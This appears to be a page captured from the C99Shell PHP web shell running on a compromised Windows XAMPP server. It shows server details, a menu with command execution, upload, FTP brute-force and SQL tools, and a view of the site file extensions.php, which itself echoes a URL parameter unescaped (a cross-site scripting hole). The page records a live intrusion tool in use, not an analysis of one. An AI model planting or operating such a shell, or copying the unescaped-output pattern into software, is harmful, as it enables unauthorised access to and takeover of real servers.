!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\inc\   drwxrwxrwx
Free 7.98 GB of 239.26 GB (3.34%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     extensions.php (1.96 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<html>
<head>
<title>PHP Extensions</title>
<style>
body { background-color: white; margin-top: 0; margin-left: 20; margin-right: 20; }
table { font-family: Arial, Helvetica, sans-serif; font-size: 12px; margin-top: 0; margin-left: 0; }
a { text-decoration: none; font-family: Arial, Helvetica, sans-serif; font-size: 12px; margin-top: 0; margin-left: 0; }
a:active { color: #2457ff; }
a:hover { color: #2457ff; text-decoration: underline; }
a:link { color: #2457ff; }
a:visited { color: #2457ff; }
.h {background-color: #9999cc; font-weight: bold; color: #000000;}
.black { background-color: #000000; color: #ffffff; }
</style>
</head>
<body>
<br />
<table width="100%" cellspacing="0"><tr><td colspan="2"><table>
<tr><td>PHP version:</td><td><b><?php echo phpversion() ?></b></td></tr>
<tr><td>Server API:</td><td><b><?php echo @php_sapi_name()?></b></td></tr>
<tr><td>Loaded extensions:</td><td><b><?php $extensions = @get_loaded_extensions(); echo count($extensions); ?></b></td></tr>
<tr><td>System:</td><td><b><?php echo @php_uname()?></b></td></tr>
</table><br /></td></tr>
<tr class="h">
<td><b>Activated extensions:</b></td>
<td><b><?php echo isset($_GET['ext']) ? $_GET['ext'] : '' ?> function list:</b></td>
</tr>
<tr><td valign="top" width="50%"><table width="100%">
<?php
    
@sort($extensions);
    foreach (
$extensions as $extension) {
        echo 
'<tr><td width="30%">' $extension '</td><td><a href="?mode=extensions&amp;ext=' $extension '">function list</a></td></tr>';
    }
?>
</table></td><td valign="top" width="50%"><table>
<?php
    
if (isset($_GET['ext'])) {
        
$functions = @get_extension_funcs($_GET['ext']);
        if (
is_array($functions)) {
            
sort($functions);
            foreach (
$functions as $function) {
                echo 
"<tr><td><a href=\"http://www.php.net/manual/function." str_replace('_''-'$function) . ".php\" target=\"_blank\">$function</a></td></tr>\n";
            }
        }
    }
?>
</table></td></tr></table></body></html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--